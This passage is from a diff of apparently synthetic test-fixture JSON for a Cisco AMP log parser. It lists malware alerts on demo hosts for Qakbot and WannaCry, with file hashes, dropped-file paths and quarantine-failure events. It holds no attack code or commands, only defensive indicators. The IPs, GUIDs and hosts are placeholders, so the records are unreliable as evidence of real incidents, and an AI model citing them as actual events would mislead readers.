"windows", + "host.os.platform": "windows", + "input.type": "log", + 
"log.offset": 83443, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.BAC7BC5281.in10.tht.Talos", + "cisco.amp.detection_id": "6411538569722068994", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "6951045.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 84690, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + 
"cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.BAC7BC5281.in10.tht.Talos", + "cisco.amp.detection_id": "6411538569722068993", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "dc41e47ebba549ec5e616ed9e88a0376", + "file.hash.sha1": "99fffe78e0cbd7b508eed13a8633903dd89ed5f1", + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 85948, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "dc41e47ebba549ec5e616ed9e88a0376", + "99fffe78e0cbd7b508eed13a8633903dd89ed5f1" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": 
"10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031906", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 812000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 87312, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031905", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, 
+ "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 88505, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031904", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 89691, + "related.hash": [ + 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], - "cisco.amp.timestamp_nanoseconds": 233000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064606", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6412662850426241000, + "event.id": 6419275399255032000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, - "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_3", - "host.name": "Demo_Qakbot_3", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 67131, + "log.offset": 90884, "related.hash": [ - "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ - "Demo_Qakbot_3" 
+ "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", 
@@ -2013,49 +4290,214 @@ ] }, { - "@timestamp": "2021-01-14T19:10:30.000Z", + "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "02:2f:e0:10:03:5d" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6412662850426241034", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection_id": "6419275394960064605", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "02:2f:e0:10:03:5d" + "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 218000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6412662850426241000, + "event.id": 6419275399255032000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, - "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_3", - "host.name": "Demo_Qakbot_3", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 68332, + "log.offset": 92070, "related.hash": [ - "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + 
"related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064607", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 93256, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + 
"cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064604", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 94442, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064603", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ 
+ "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 95628, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ - "Demo_Qakbot_3" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", 
@@ -2068,49 +4510,49 @@ ] }, { - "@timestamp": "2021-01-14T19:10:30.000Z", + "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "02:2f:e0:10:03:5d" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6412662850426241033", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection_id": "6419275394960064602", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "02:2f:e0:10:03:5d" + "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 218000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6412662850426241000, + "event.id": 6419275399255032000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, - "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_3", - "host.name": "Demo_Qakbot_3", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 69533, + "log.offset": 96814, "related.hash": [ - "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], 
"related.hosts": [ - "Demo_Qakbot_3" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", @@ -2123,7 +4565,7 @@ ] }, { - "@timestamp": "2021-01-14T18:03:55.000Z", + "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2134,9 +4576,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419281601187807332", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, + "cisco.amp.detection_id": "6419275394960064601", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, "cisco.amp.event_type_id": 2164260880, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -2145,24 +4587,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 891000000, + "cisco.amp.timestamp_nanoseconds": 281000000, "event.action": "Quarantine Failure", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419281601187807000, + "event.id": 6419275399255032000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 74502, + "log.offset": 98000, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ "Demo_WannaCry_Ransomware" 
@@ -2178,7 +4620,7 @@ ] }, { - "@timestamp": "2021-01-14T18:03:52.000Z", + "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", 
@@ -2189,50 +4631,35 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6419281588302905443", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection_id": "6419275394960064598", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 396000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", "event.category": [ - "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419281588302905000, + "event.id": 6419275399255032000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", - "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", - "file.name": "mssecsvc.exe", - "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 77209, - "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", - "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", - "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", - "process.name": "lsass.exe", - "process.pid": 708, + "log.offset": 99186, "related.hash": [ - 
"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", - "db349b97c37d22f5ea1d1841e3c89eb4", - "e889544aff85ffaf8b0d0da705105dee7c97fe26" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -2241,9 +4668,6 @@ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -2251,49 +4675,49 @@ ] }, { - "@timestamp": "2021-01-14T17:51:19.000Z", + "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "f9:65:da:22:2a:41" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6411538569722068995", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection_id": "6419275394960064600", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "f9:65:da:22:2a:41" + "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 495000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6411538569722069000, + "event.id": 6419275399255032000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, - "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_1", - "host.name": "Demo_Qakbot_1", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 79928, + "log.offset": 100372, "related.hash": [ - "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], 
"related.hosts": [ - "Demo_Qakbot_1" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", 
@@ -2306,54 +4730,68 @@ ] }, { - "@timestamp": "2021-01-14T17:51:19.000Z", + "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "f9:65:da:22:2a:41" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6411538569722068994", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275399255031906", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "f9:65:da:22:2a:41" + "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 495000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 812000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6411538569722069000, + "event.id": 6419275399255032000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, - "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_1", - "host.name": "Demo_Qakbot_1", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", 
"input.type": "log", - "log.offset": 81129, + "log.offset": 101558, + "process.hash.md5": "ad7b9c14083b52bc532fba5948342b98", + "process.hash.sha1": "ee8cbf12d87c4d388f09b4f69bed2e91682920b5", + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "process.name": "cmd.exe", + "process.pid": 3200, "related.hash": [ - "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ - "Demo_Qakbot_1" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
